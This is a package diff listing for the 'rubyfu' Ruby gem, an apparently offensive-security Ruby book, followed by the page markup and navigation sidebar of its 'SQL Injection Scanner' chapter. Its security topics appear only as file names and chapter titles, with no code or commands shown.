rubyfu 1.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (151) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html ADDED
@@ -0,0 +1,1489 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>SQL Injection Scanner | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x4__web_kung_fu/databases.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x4__web_kung_fu/index.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="4.1"
67
+ data-chapter-title="SQL Injection Scanner"
68
+ data-filepath="module_0x4__web_kung_fu/sql_injection_scanner.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter active" data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
+ Module 0x5 | Exploitation Kung Fu
